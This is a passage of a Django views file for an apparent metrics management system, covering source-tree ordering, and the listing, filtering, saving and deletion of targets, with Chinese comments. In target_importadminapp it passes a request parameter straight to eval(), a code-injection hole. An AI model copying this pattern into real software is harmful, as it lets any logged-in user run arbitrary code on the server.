try:\n id = int(id)\n except:\n raise Http404()\n all_source = Source.objects.filter(id=id)\n if all_source.exists():\n all_source = all_source[0]\n sort = all_source.sort\n p_source = all_source.pnode\n all_source.state = 9\n all_source.save()\n sort_source = Source.objects.filter(pnode=p_source).filter(\n sort__gt=sort).exclude(state=\"9\").filter(type='')\n if sort_source.exists():\n for sortstep in sort_source:\n try:\n sortstep.sort = sortstep.sort - 1\n sortstep.save()\n except:\n pass\n\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef move_source(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n parent = request.POST.get('parent', '')\n old_parent = 
request.POST.get('old_parent', '')\n old_position = request.POST.get('old_position', '')\n position = request.POST.get('position', '')\n try:\n id = int(id)\n except:\n raise Http404()\n try:\n parent = int(parent)\n except:\n parent = None\n try:\n old_parent = int(old_parent)\n except:\n old_parent = None\n try:\n old_position = int(old_position)\n except:\n raise Http404()\n try:\n position = int(position)\n except:\n raise Http404()\n\n cur_source_obj = \\\n Source.objects.filter(pnode_id=old_parent).filter(\n sort=old_position).exclude(state=\"9\").filter(type='')[0]\n cur_source_obj.sort = position\n cur_source_id = cur_source_obj.id\n cur_source_obj.save()\n # 同一pnode\n if parent == old_parent:\n # 向上拽\n source_under_pnode = Source.objects.filter(pnode_id=old_parent).exclude(state=\"9\").filter(\n sort__gte=position,\n sort__lt=old_position).exclude(id=cur_source_id).filter(type='')\n for source in source_under_pnode:\n source.sort += 1\n source.save()\n\n # 向下拽\n source_under_pnode = Source.objects.filter(pnode_id=old_parent).exclude(state=\"9\").filter(\n sort__gt=old_position, sort__lte=position).exclude(id=cur_source_id).filter(type='')\n for source in source_under_pnode:\n source.sort -= 1\n source.save()\n\n # 向其他节点拽\n else:\n # 原来pnode下\n old_source = Source.objects.filter(pnode_id=old_parent).exclude(state=\"9\").filter(\n sort__gt=old_position).exclude(id=cur_source_id).filter(type='')\n for step in old_source:\n step.sort -= 1\n step.save()\n # 后来pnode下\n cur_source = Source.objects.filter(pnode_id=parent).exclude(state=\"9\").filter(\n sort__gte=position).exclude(\n id=cur_source_id).filter(type='')\n for source in cur_source:\n source.sort += 1\n source.save()\n # pnode\n if parent:\n parent_source = Source.objects.get(id=parent)\n else:\n parent_source = None\n mystep = Source.objects.get(id=id)\n try:\n mystep.pnode = parent_source\n mystep.save()\n except:\n pass\n\n if parent != old_parent:\n if parent == None:\n return HttpResponse(\" ^ \")\n else:\n return HttpResponse(parent_source.name + \"^\" + str(parent_source.id))\n else:\n return HttpResponse(\"0\")\n\n\ndef target_index(request, funid):\n \"\"\"\n 指标管理\n 过滤条件:\n 管理应用\n 查询应用\n\n 操作类型\n 周期类型\n 业务类型\n 机组 unit\n\n DictIndex 字典名称 >> DictList 字典条目\n \"\"\"\n if request.user.is_authenticated():\n app_list = []\n operation_type_list = []\n cycle_type_list = []\n business_type_list = []\n unit_list = []\n source_list = []\n cycle_list = []\n storage_list = []\n\n applist = App.objects.all().exclude(state='9')\n for i in applist:\n # 业务\n works = i.work_set.exclude(state='9').values('id', 'name', 'core')\n\n app_list.append({\n \"app_name\": i.name,\n \"app_id\": i.id,\n \"works\": works,\n })\n\n c_dict_index_1 = DictIndex.objects.filter(\n id=1).exclude(state='9')\n if c_dict_index_1.exists():\n c_dict_index_1 = c_dict_index_1[0]\n dict_list1 = c_dict_index_1.dictlist_set.exclude(state=\"9\")\n for i in dict_list1:\n operation_type_list.append({\n \"operation_type_name\": i.name,\n \"operation_type_id\": i.id,\n })\n\n c_dict_index_2 = DictIndex.objects.filter(\n id=12).exclude(state='9')\n if c_dict_index_2.exists():\n c_dict_index_2 = c_dict_index_2[0]\n dict_list2 = c_dict_index_2.dictlist_set.exclude(state=\"9\")\n for i in dict_list2:\n cycle_type_list.append({\n \"cycle_type_name\": i.name,\n \"cycle_type_id\": i.id,\n })\n\n c_dict_index_3 = DictIndex.objects.filter(\n id=5).exclude(state='9')\n if c_dict_index_3.exists():\n c_dict_index_3 = c_dict_index_3[0]\n dict_list3 = 
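# --- Sketch checking the move_source sort arithmetic below against plain
# lists: a same-parent drag shifts every sibling between the old and new
# positions by one in the opposite direction, which is exactly a pop +
# insert. String ids stand in for Source rows.
def move_within_parent(siblings, old_position, position):
    """Reorder a list of ids the way the queryset updates reorder `sort`."""
    item = siblings.pop(old_position)
    siblings.insert(position, item)
    return siblings

print(move_within_parent(["a", "b", "c", "d"], 3, 0))  # ['d', 'a', 'b', 'c']
print(move_within_parent(["a", "b", "c", "d"], 0, 2))  # ['b', 'c', 'a', 'd']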
c_dict_index_3.dictlist_set.exclude(state=\"9\")\n for i in dict_list3:\n business_type_list.append({\n \"business_type_name\": i.name,\n \"business_type_id\": i.id,\n })\n\n c_dict_index_4 = DictIndex.objects.filter(\n id=6).exclude(state='9')\n if c_dict_index_4.exists():\n c_dict_index_4 = c_dict_index_4[0]\n dict_list4 = c_dict_index_4.dictlist_set.exclude(state=\"9\")\n for i in dict_list4:\n unit_list.append({\n \"unit_name\": i.name,\n \"unit_id\": i.id,\n })\n sourcelist = Source.objects.all().exclude(state='9').exclude(pnode=None).filter(type='')\n for i in sourcelist:\n source_list.append({\n \"source_name\": i.name,\n \"source_id\": i.id,\n })\n\n cyclelist = Cycle.objects.all().exclude(state='9')\n for i in cyclelist:\n cycle_list.append({\n \"cycle_name\": i.name,\n \"cycle_id\": i.id,\n })\n\n storagelist = Storage.objects.all().exclude(state='9')\n\n all_dict_list = DictList.objects.exclude(state='9').values('id', 'name')\n\n for i in storagelist:\n storage_type = i.storagetype\n storage_type_display = \"\"\n for dict in all_dict_list:\n if storage_type == str(dict['id']):\n storage_type_display = dict['name']\n break\n\n storage_list.append({\n \"storage_name\": i.name,\n \"storage_id\": i.id,\n 'storage_type': storage_type_display,\n \"tablename\": i.tablename,\n })\n\n # 加权指标\n weight_targets = Target.objects.exclude(state='9').values('id', 'name', 'code')\n return render(request, 'target.html',\n {'username': request.user.userinfo.fullname,\n \"app_list\": app_list,\n \"operation_type_list\": operation_type_list,\n \"cycle_type_list\": cycle_type_list,\n \"business_type_list\": business_type_list,\n \"unit_list\": unit_list,\n \"source_list\": source_list,\n \"cycle_list\": cycle_list,\n \"storage_list\": storage_list,\n \"weight_targets\": weight_targets,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef load_weight_targets(request):\n if request.user.is_authenticated():\n app_id = request.POST.get('app_id', '')\n weight_target_list = []\n try:\n app_id = int(app_id)\n except:\n # 加权指标\n weight_targets = Target.objects.exclude(state='9').values('id', 'name', 'code')\n else:\n weight_targets = Target.objects.filter(adminapp_id=app_id).exclude(state='9').values('id', 'name', 'code')\n\n weight_target_list = [{\"id\": w['id'], \"text\": \"{name}({code})\".format(name=w['name'], code=w['code'])} for w in\n weight_targets]\n return JsonResponse({'data': str(weight_target_list)})\n else:\n return HttpResponseRedirect('/login')\n\n\ndef target_data(request):\n if request.user.is_authenticated():\n result = []\n search_adminapp = request.GET.get('search_adminapp', '')\n search_app = request.GET.get('search_app', '')\n search_operationtype = request.GET.get('search_operationtype', '')\n search_cycletype = request.GET.get('search_cycletype', '')\n search_businesstype = request.GET.get('search_businesstype', '')\n search_unit = request.GET.get('search_unit', '')\n search_app_noselect = request.GET.get('search_app_noselect', '')\n datatype = request.GET.get('datatype', '')\n works = request.GET.get('works', '')\n search_cumulative = request.GET.get('search_cumulative', '')\n\n all_target = Target.objects.exclude(state=\"9\").order_by(\"sort\").select_related(\n \"adminapp\", \"storage\", \"work\"\n ).prefetch_related('app')\n if search_adminapp != \"\":\n if search_adminapp == 'null':\n all_target = all_target.filter(adminapp=None)\n else:\n curadminapp = App.objects.get(id=int(search_adminapp))\n all_target = 
all_target.filter(adminapp=curadminapp)\n if search_app != \"\":\n curadminapp = App.objects.get(id=int(search_app))\n curapp = App.objects.filter(id=int(search_app))\n all_target = all_target.exclude(adminapp=curadminapp).filter(app__in=curapp)\n\n try:\n search_app_noselect = int(search_app_noselect)\n except:\n pass\n else:\n # 过滤查询指标\n # 剔除当前核心业务的指标\n all_target = all_target.filter((~Q(adminapp__id=search_app_noselect) & ~Q(app__id=search_app_noselect)) | (\n (~Q(work__core='是') & ~Q(app__id=search_app_noselect) & Q(adminapp__id=search_app_noselect))))\n\n if search_operationtype != \"\":\n all_target = all_target.filter(operationtype=search_operationtype)\n if search_cycletype != \"\":\n all_target = all_target.filter(cycletype=search_cycletype)\n if search_businesstype != \"\":\n all_target = all_target.filter(businesstype=search_businesstype)\n if search_unit != \"\":\n all_target = all_target.filter(unit=search_unit)\n if datatype != \"\":\n all_target = all_target.filter(datatype=datatype)\n if search_cumulative != \"\":\n all_target = all_target.filter(cumulative=search_cumulative)\n try:\n works = int(works)\n all_target = all_target.filter(work_id=works)\n except:\n pass\n\n all_dict_list = DictList.objects.exclude(state='9').values('id', 'name')\n all_works = Work.objects.exclude(state='9').values('id', 'name', 'app_id')\n\n for target in all_target:\n operationtype = target.operationtype\n if operationtype:\n for dict in all_dict_list:\n if operationtype == str(dict['id']):\n operationtype = dict['name']\n break\n\n cycletype = target.cycletype\n if cycletype:\n for dict in all_dict_list:\n if cycletype == str(dict['id']):\n cycletype = dict['name']\n break\n\n businesstype = target.businesstype\n if businesstype:\n for dict in all_dict_list:\n if businesstype == str(dict['id']):\n businesstype = dict['name']\n break\n\n unit = target.unit\n if unit:\n for dict in all_dict_list:\n if unit == str(dict['id']):\n unit = dict['name']\n break\n\n # 查询应用\n applist = []\n for my_app in target.app.all():\n applist.append(my_app.id)\n\n adminapp_name = \"\"\n try:\n adminapp_name = target.adminapp.name\n except:\n pass\n\n # 存储类型\n storage_type_display = \"\"\n storage = target.storage\n if storage:\n storage_type = storage.storagetype\n if storage_type:\n for dict in all_dict_list:\n if storage_type == str(dict['id']):\n storage_type_display = dict['name']\n break\n\n # 根据adminapp过滤出业务,并选中的业务\n work_selected = target.work.id if target.work else ''\n work_selected_name = target.work.name if target.work else ''\n admin_app = target.adminapp\n if admin_app:\n works = [work for work in all_works if work['app_id'] == admin_app.id]\n\n result.append({\n \"operationtype_name\": operationtype,\n \"cycletype_name\": cycletype,\n \"businesstype_name\": businesstype,\n \"unit_name\": unit,\n \"adminapp_name\": adminapp_name,\n \"id\": target.id,\n \"name\": target.name,\n \"code\": target.code,\n \"operationtype\": target.operationtype,\n \"cycletype\": target.cycletype,\n \"businesstype\": target.businesstype,\n \"unit\": target.unit,\n \"adminapp\": target.adminapp_id,\n \"app\": applist,\n \"magnification\": target.magnification,\n \"digit\": target.digit,\n \"datatype\": target.datatype,\n \"cumulative\": target.cumulative,\n \"weight_target\": target.weight_target.id if target.weight_target else '',\n\n \"upperlimit\": target.upperlimit,\n \"lowerlimit\": target.lowerlimit,\n \"formula\": target.formula,\n \"cycle\": target.cycle_id if target.cycle_id else \"\",\n \"source\": 
target.source_id,\n \"source_content\": target.source_content,\n \"storage\": target.storage_id,\n\n # 行、列判断是否展示存储标识\n \"storage_type\": storage_type_display,\n\n \"storagefields\": target.storagefields,\n \"storagetag\": target.storagetag,\n \"sort\": target.sort,\n \"state\": target.state,\n \"remark\": target.remark,\n\n 'work_selected': work_selected,\n 'work_selected_name': work_selected_name,\n 'works': str(works),\n \"unity\": target.unity,\n \"is_repeat\": target.is_repeat,\n \"data_from\": target.data_from,\n\n \"if_push\": target.if_push,\n # \"push_config\": json.dumps(target.push_config if target.push_config else {}),\n \"push_config\": target.push_config.replace('\"', '\\\\\\\"').replace(\"\\'\", '\"') if target.push_config else \"\",\n # \"push_config\": target.push_config.replace('\"', '\\\"') if target.push_config else \"\",\n \"is_select\": target.is_select,\n \"warn_range\": target.warn_range\n })\n return JsonResponse({\"data\": result})\n\n\ndef target_formula_data(request):\n if request.user.is_authenticated():\n all_target = Target.objects.exclude(state=\"9\")\n all_constant = Constant.objects.exclude(state=\"9\")\n formula_analysis_data = {}\n for target in all_target:\n analysis_code = target.code\n analysis_name = target.name\n formula_analysis_data[analysis_code] = analysis_name\n for constant in all_constant:\n analysis_code = constant.code\n analysis_name = constant.name\n formula_analysis_data[analysis_code] = analysis_name\n return HttpResponse(json.dumps(formula_analysis_data, ensure_ascii=False))\n\n\ndef target_save(request):\n if request.user.is_authenticated():\n id = request.POST.get(\"id\", \"\")\n name = request.POST.get(\"name\", \"\")\n code = request.POST.get(\"code\", \"\")\n operationtype = request.POST.get(\"operationtype\", \"\")\n cycletype = request.POST.get(\"cycletype\", \"\")\n businesstype = request.POST.get(\"businesstype\", \"\")\n unit = request.POST.get(\"unit\", \"\")\n\n adminapp = request.POST.get(\"adminapp\", \"\")\n app_list = request.POST.getlist('app[]')\n datatype = request.POST.get(\"datatype\", \"\")\n magnification = request.POST.get(\"magnification\", \"\")\n digit = request.POST.get(\"digit\", \"\")\n upperlimit = request.POST.get(\"upperlimit\", \"\")\n lowerlimit = request.POST.get(\"lowerlimit\", \"\")\n cumulative = request.POST.get(\"cumulative\", \"\")\n weight_target = request.POST.get(\"weight_target\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n\n formula = request.POST.get(\"formula\", \"\")\n\n cycle = request.POST.get(\"cycle\", \"\")\n source = request.POST.get(\"source\", \"\")\n\n source_content = request.POST.get(\"source_content\", \"\")\n\n storage = request.POST.get(\"storage\", \"\")\n storagetag = request.POST.get(\"storagetag\", \"\")\n storagefields = request.POST.get(\"storagefields\", \"\")\n\n is_repeat = request.POST.get(\"is_repeat\", \"\")\n savetype = request.POST.get(\"savetype\", \"\")\n\n works = request.POST.get('works', '')\n unity = request.POST.get('unity', '')\n\n data_from = request.POST.get('data_from', '')\n calculate_source = request.POST.get('calculate_source', '')\n calculate_content = request.POST.get('calculate_content', '')\n\n if_push = request.POST.get('if_push', '')\n push_config = request.POST.get('push_config', '')\n is_select = request.POST.get('is_select', '')\n warn_range = request.POST.get('warn_range', '')\n\n try:\n push_config = json.loads(push_config)\n except:\n pass\n # {'dest_fields': ['b', 'd', 'werwer'], 'origin_source': '2', 'constraint_fields': 
['rfe'], 'dest_table': 'reffa', 'origin_fields': ['a', 'c', 'wewer']}\n\n all_app = App.objects.exclude(state=\"9\")\n all_cycle = Cycle.objects.exclude(state=\"9\")\n all_source = Source.objects.exclude(state=\"9\").filter(type='')\n all_storage = Storage.objects.exclude(state=\"9\")\n\n try:\n id = int(id)\n except:\n raise Http404()\n\n result = {}\n\n if not name.strip():\n result[\"res\"] = '指标名称不能为空。'\n elif not code.strip():\n result[\"res\"] = '指标代码不能为空。'\n elif not operationtype.strip():\n result[\"res\"] = '操作类型不能为空。'\n elif not cycletype.strip():\n result[\"res\"] = '周期类型不能为空。'\n elif not businesstype.strip():\n result[\"res\"] = '业务类型不能为空。'\n elif not unit.strip():\n result[\"res\"] = '机组不能为空。'\n elif not datatype.strip():\n result[\"res\"] = '数据类型不能为空。'\n else:\n if datatype.strip() == 'numbervalue':\n if not magnification:\n result[\"res\"] = '数据类型为数值时,倍率不能为空。'\n return JsonResponse(result)\n if not digit:\n result[\"res\"] = '数据类型为数值时,保留位数不能为空。'\n return JsonResponse(result)\n if operationtype == '17' and not data_from:\n result[\"res\"] = '操作类型为数据计算时,必须选择数据来源。'\n else:\n if id == 0:\n all_target = Target.objects.filter(code=code).exclude(state=\"9\")\n all_constant = Constant.objects.filter(code=code).exclude(state=\"9\")\n if (len(all_target) > 0):\n result[\"res\"] = '指标代码:' + \\\n code + '已存在。'\n else:\n if (len(all_constant) > 0):\n result[\"res\"] = '常数库内已存在:' + code + '。'\n else:\n target_save = Target()\n target_save.name = name\n target_save.code = code\n target_save.operationtype = operationtype\n target_save.cycletype = cycletype\n target_save.businesstype = businesstype\n target_save.unit = unit\n target_save.unity = unity\n target_save.is_select = is_select\n if data_from:\n target_save.data_from = data_from\n\n # 业务\n try:\n works = int(works)\n except:\n pass\n else:\n target_save.work_id = works\n\n if datatype == 'numbervalue':\n try:\n target_save.magnification = float(magnification)\n except:\n pass\n try:\n target_save.digit = int(digit)\n except:\n pass\n try:\n target_save.upperlimit = float(upperlimit)\n except:\n pass\n try:\n target_save.lowerlimit = float(lowerlimit)\n except:\n pass\n target_save.cumulative = cumulative\n if cumulative == '3':\n try:\n weight_target = int(weight_target)\n except:\n weight_target = None\n target_save.weight_target_id = weight_target\n else:\n target_save.weight_target_id = None\n target_save.datatype = datatype\n try:\n app_id = int(adminapp)\n my_app = all_app.get(id=app_id)\n target_save.adminapp = my_app\n except:\n pass\n\n try:\n target_save.sort = int(sort)\n except:\n pass\n try:\n target_save.warn_range = int(warn_range)\n except:\n target_save.warn_range = None\n # 计算\n if operationtype == '17':\n target_save.formula = formula\n target_save.source_content = calculate_content\n try:\n calculate_source = int(calculate_source)\n except:\n calculate_source = None\n finally:\n target_save.source_id = calculate_source\n # 电表走字/提取\n if operationtype in ['1', '16'] and savetype != 'app':\n # 提取:推送配置\n if operationtype == \"16\":\n if if_push == '1':\n target_save.push_config = str(push_config)\n target_save.if_push = if_push\n\n try:\n cycle_id = int(cycle)\n my_cycle = all_cycle.get(id=cycle_id)\n target_save.cycle = my_cycle\n except:\n target_save.cycle = None\n try:\n source_id = int(source)\n my_source = all_source.get(id=source_id)\n target_save.source = my_source\n except:\n pass\n\n target_save.source_content = source_content\n try:\n target_save.is_repeat = int(is_repeat)\n except:\n pass\n try:\n 
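Aside: push_config is parsed with json.loads here but persisted with str(push_config) further down, which is why reading it back needs the quote-swapping replace() calls seen in target_data. A sketch of a symmetric round-trip, assuming the field stays a plain text column:

import json

def encode_push_config(config):
    # Persist canonical JSON instead of a Python repr, so no quote fixups
    # are needed when the value is echoed back to the page.
    return json.dumps(config, ensure_ascii=False)

def decode_push_config(raw):
    try:
        return json.loads(raw)
    except (TypeError, ValueError):
        return {}

raw = encode_push_config({"dest_table": "reffa", "origin_source": "2"})
print(decode_push_config(raw)["dest_table"])  # -> reffa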
storage_id = int(storage)\n my_storage = all_storage.get(id=storage_id)\n target_save.storage = my_storage\n except:\n pass\n target_save.storagetag = storagetag\n target_save.storagefields = storagefields\n target_save.save()\n # 存入多对多app\n if savetype != 'app':\n for app_id in app_list:\n try:\n app_id = int(app_id)\n my_app = all_app.get(id=app_id)\n target_save.app.add(my_app)\n except:\n pass\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = target_save.id\n else:\n # 指标修改保存前,查看指标类型与本次类型是否相同,若不同:将该指标所有数据迁移至新的表中\n try:\n c_target = Target.objects.exclude(state=\"9\").get(id=id)\n except:\n result[\"res\"] = \"指标不存在。\"\n else:\n status, info = migrate_data_before_target_changed(c_target, operationtype)\n if status == 0:\n result[\"res\"] = info\n else:\n all_target = Target.objects.filter(code=code).exclude(id=id).exclude(\n state=\"9\")\n all_constant = Constant.objects.filter(code=code).exclude(state=\"9\")\n if (len(all_target) > 0):\n result[\"res\"] = '指标代码:' + \\\n code + '已存在。'\n else:\n if (len(all_constant) > 0):\n result[\"res\"] = '常数库内已存在:' + code + '。'\n else:\n try:\n target_save = Target.objects.get(\n id=id)\n target_save.name = name\n target_save.code = code\n target_save.operationtype = operationtype\n target_save.cycletype = cycletype\n target_save.businesstype = businesstype\n target_save.unit = unit\n target_save.unity = unity\n target_save.is_select = is_select\n if data_from:\n target_save.data_from = data_from\n\n # 业务\n try:\n works = int(works)\n except:\n pass\n else:\n target_save.work_id = works\n\n if datatype == 'numbervalue':\n try:\n target_save.magnification = float(magnification)\n except:\n pass\n try:\n target_save.digit = int(digit)\n except:\n pass\n try:\n target_save.upperlimit = float(upperlimit)\n except:\n pass\n try:\n target_save.lowerlimit = float(lowerlimit)\n except:\n pass\n target_save.cumulative = cumulative\n if cumulative == '3':\n try:\n weight_target = int(weight_target)\n except:\n weight_target = None\n target_save.weight_target_id = weight_target\n else:\n target_save.weight_target_id = None\n\n target_save.datatype = datatype\n try:\n app_id = int(adminapp)\n my_app = all_app.get(id=app_id)\n target_save.adminapp = my_app\n except:\n pass\n\n try:\n target_save.sort = int(sort)\n except:\n pass\n try:\n target_save.warn_range = int(warn_range)\n except:\n target_save.warn_range = None\n if operationtype == '17':\n target_save.formula = formula\n target_save.source_content = calculate_content\n try:\n calculate_source = int(calculate_source)\n except:\n calculate_source = None\n finally:\n target_save.source_id = calculate_source\n if operationtype in ['1', '16'] and savetype != 'app':\n if operationtype == \"16\":\n if if_push == '1':\n target_save.push_config = str(push_config)\n target_save.if_push = if_push\n\n try:\n cycle_id = int(cycle)\n my_cycle = all_cycle.get(id=cycle_id)\n target_save.cycle = my_cycle\n except:\n target_save.cycle = None\n try:\n source_id = int(source)\n my_source = all_source.get(id=source_id)\n target_save.source = my_source\n except:\n pass\n\n target_save.source_content = source_content\n try:\n target_save.is_repeat = int(is_repeat)\n except:\n pass\n try:\n storage_id = int(storage)\n my_storage = all_storage.get(id=storage_id)\n target_save.storage = my_storage\n except:\n pass\n target_save.storagetag = storagetag\n target_save.storagefields = storagefields\n target_save.save()\n # 存入多对多app\n if savetype != 'app':\n target_save.app.clear()\n for app_id in app_list:\n try:\n app_id = 
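Aside: both the create and update branches repeat the try/int()/except and try/float()/except pattern many times over. A minimal sketch of shared coercion helpers with the same fall-through behaviour:

def to_int(raw, default=None):
    try:
        return int(raw)
    except (TypeError, ValueError):
        return default

def to_float(raw, default=None):
    try:
        return float(raw)
    except (TypeError, ValueError):
        return default

# e.g. target_save.sort = to_int(sort, default=target_save.sort)
print(to_int("42"), to_float("", default=0.0))  # -> 42 0.0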
int(app_id)\n my_app = all_app.get(id=app_id)\n target_save.app.add(my_app)\n except:\n pass\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = target_save.id\n except Exception as e:\n print(e)\n result[\"res\"] = \"修改失败。\"\n\n return JsonResponse(result)\n\n\ndef target_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n target = Target.objects.get(id=id)\n target.state = \"9\"\n target.save()\n\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef target_app_index(request, funid):\n \"\"\"\n 指标管理\n \"\"\"\n if request.user.is_authenticated():\n operation_type_list = []\n cycle_type_list = []\n business_type_list = []\n unit_list = []\n source_list = []\n cycle_list = []\n storage_list = []\n app_list = []\n adminapp = \"\"\n try:\n cur_fun = Fun.objects.filter(id=int(funid)).exclude(state='9')\n adminapp = cur_fun[0].app\n except:\n return HttpResponseRedirect(\"/index\")\n\n applist = App.objects.all().exclude(state='9')\n for i in applist:\n app_list.append({\n \"app_name\": i.name,\n \"app_id\": i.id,\n })\n\n c_dict_index_1 = DictIndex.objects.filter(\n id=1).exclude(state='9')\n if c_dict_index_1.exists():\n c_dict_index_1 = c_dict_index_1[0]\n dict_list1 = c_dict_index_1.dictlist_set.exclude(state=\"9\")\n for i in dict_list1:\n operation_type_list.append({\n \"operation_type_name\": i.name,\n \"operation_type_id\": i.id,\n })\n\n c_dict_index_2 = DictIndex.objects.filter(\n id=12).exclude(state='9')\n if c_dict_index_2.exists():\n c_dict_index_2 = c_dict_index_2[0]\n dict_list2 = c_dict_index_2.dictlist_set.exclude(state=\"9\")\n for i in dict_list2:\n cycle_type_list.append({\n \"cycle_type_name\": i.name,\n \"cycle_type_id\": i.id,\n })\n\n c_dict_index_3 = DictIndex.objects.filter(\n id=5).exclude(state='9')\n if c_dict_index_3.exists():\n c_dict_index_3 = c_dict_index_3[0]\n dict_list3 = c_dict_index_3.dictlist_set.exclude(state=\"9\")\n for i in dict_list3:\n business_type_list.append({\n \"business_type_name\": i.name,\n \"business_type_id\": i.id,\n })\n\n c_dict_index_4 = DictIndex.objects.filter(\n id=6).exclude(state='9')\n if c_dict_index_4.exists():\n c_dict_index_4 = c_dict_index_4[0]\n dict_list4 = c_dict_index_4.dictlist_set.exclude(state=\"9\")\n for i in dict_list4:\n unit_list.append({\n \"unit_name\": i.name,\n \"unit_id\": i.id,\n })\n\n sourcelist = Source.objects.all().exclude(state='9').exclude(pnode_id=None).filter(type='')\n for i in sourcelist:\n source_list.append({\n \"source_name\": i.name,\n \"source_id\": i.id,\n })\n\n cyclelist = Cycle.objects.all().exclude(state='9')\n for i in cyclelist:\n cycle_list.append({\n \"cycle_name\": i.name,\n \"cycle_id\": i.id,\n })\n\n all_dict_list = DictList.objects.exclude(state='9').values('id', 'name')\n\n storagelist = Storage.objects.all().exclude(state='9')\n for i in storagelist:\n storage_type = i.storagetype\n storage_type_display = \"\"\n for dict in all_dict_list:\n if storage_type == str(dict['id']):\n storage_type_display = dict['name']\n break\n storage_list.append({\n \"storage_name\": i.name,\n \"storage_id\": i.id,\n \"storage_type\": storage_type_display,\n \"tablename\": i.tablename,\n })\n\n # 所有业务\n works_list = []\n if adminapp:\n works_list = adminapp.work_set.exclude(state='9').values('id', 'name', 'core')\n\n return render(request, 'target_app.html',\n {'username': request.user.userinfo.fullname,\n \"app_list\": app_list,\n \"operation_type_list\": 
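Aside: the update path above saves the Target row and then rewrites its app M2M with clear() followed by an add() loop. A hedged sketch of the same step under one transaction, assuming the relation name used above:

from django.db import transaction

def save_target_with_apps(target, apps):
    # One atomic unit: a failure mid-way cannot leave the row saved but
    # the app links half-rewritten.
    with transaction.atomic():
        target.save()
        target.app.set(apps)  # set() replaces the clear()+add() loop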
operation_type_list,\n \"cycle_type_list\": cycle_type_list,\n \"business_type_list\": business_type_list,\n \"unit_list\": unit_list,\n \"source_list\": source_list,\n \"cycle_list\": cycle_list,\n \"storage_list\": storage_list,\n \"adminapp\": adminapp.id if adminapp else '',\n \"works_list\": works_list,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef target_importadminapp(request):\n if request.user.is_authenticated():\n adminapp = request.POST.get(\"adminapp\", \"\")\n selectedtarget = request.POST.get('selectedtarget', '[]')\n\n result = {}\n try:\n app_id = int(adminapp)\n except:\n result[\"res\"] = '数据异常,请重新打开页面。'\n else:\n my_app = App.objects.exclude(state=\"9\").filter(id=app_id)\n if len(my_app) > 0:\n curapp = my_app[0]\n\n Target.objects.exclude(state=\"9\").filter(\n id__in=[int(target) for target in eval(selectedtarget)]).update(**{\n 'adminapp': curapp\n })\n\n result[\"res\"] = '导入完成。'\n else:\n result[\"res\"] = '当前应用不存在。'\n\n return JsonResponse(result)\n\n\ndef target_app_search_index(request, funid):\n \"\"\"\n 指标管理\n \"\"\"\n if request.user.is_authenticated():\n operation_type_list = []\n cycle_type_list = []\n business_type_list = []\n unit_list = []\n source_list = []\n cycle_list = []\n storage_list = []\n adminapp = \"\"\n try:\n cur_fun = Fun.objects.filter(id=int(funid)).exclude(state='9')\n adminapp = cur_fun[0].app_id\n except:\n return HttpResponseRedirect(\"/index\")\n\n c_dict_index_1 = DictIndex.objects.filter(\n id=1).exclude(state='9')\n if c_dict_index_1.exists():\n c_dict_index_1 = c_dict_index_1[0]\n dict_list1 = c_dict_index_1.dictlist_set.exclude(state=\"9\")\n for i in dict_list1:\n operation_type_list.append({\n \"operation_type_name\": i.name,\n \"operation_type_id\": i.id,\n })\n\n c_dict_index_2 = DictIndex.objects.filter(\n id=12).exclude(state='9')\n if c_dict_index_2.exists():\n c_dict_index_2 = c_dict_index_2[0]\n dict_list2 = c_dict_index_2.dictlist_set.exclude(state=\"9\")\n for i in dict_list2:\n cycle_type_list.append({\n \"cycle_type_name\": i.name,\n \"cycle_type_id\": i.id,\n })\n\n c_dict_index_3 = DictIndex.objects.filter(\n id=5).exclude(state='9')\n if c_dict_index_3.exists():\n c_dict_index_3 = c_dict_index_3[0]\n dict_list3 = c_dict_index_3.dictlist_set.exclude(state=\"9\")\n for i in dict_list3:\n business_type_list.append({\n \"business_type_name\": i.name,\n \"business_type_id\": i.id,\n })\n\n c_dict_index_4 = DictIndex.objects.filter(\n id=6).exclude(state='9')\n if c_dict_index_4.exists():\n c_dict_index_4 = c_dict_index_4[0]\n dict_list4 = c_dict_index_4.dictlist_set.exclude(state=\"9\")\n for i in dict_list4:\n unit_list.append({\n \"unit_name\": i.name,\n \"unit_id\": i.id,\n })\n\n sourcelist = Source.objects.all().exclude(state='9').filter(type='')\n for i in sourcelist:\n source_list.append({\n \"source_name\": i.name,\n \"source_id\": i.id,\n })\n\n cyclelist = Cycle.objects.all().exclude(state='9')\n for i in cyclelist:\n cycle_list.append({\n \"cycle_name\": i.name,\n \"cycle_id\": i.id,\n })\n\n storagelist = Storage.objects.all().exclude(state='9')\n for i in storagelist:\n storage_list.append({\n \"storage_name\": i.name,\n \"storage_id\": i.id,\n })\n\n # 所有业务 所有应用\n all_works = Work.objects.exclude(state='9').values('app_id', 'id', 'name')\n all_apps = App.objects.exclude(state='9').values('id', 'name')\n search_app = []\n for aa in all_apps:\n works = []\n\n for aw in all_works:\n if aw['app_id'] == aa['id']:\n works.append({\n 'id': aw['id'],\n 
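Aside: target_importadminapp and target_importapp run eval() on the POSTed selectedtarget string, which executes arbitrary expressions from the request body. A sketch of the same parse via json.loads, which accepts the '[1, 2, 3]' payload but nothing executable:

import json

def parse_id_list(raw):
    try:
        return [int(i) for i in json.loads(raw)]
    except (TypeError, ValueError):
        return []

print(parse_id_list('[3, "7"]'))          # -> [3, 7]
print(parse_id_list('__import__("os")'))  # -> [] (rejected, not run)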
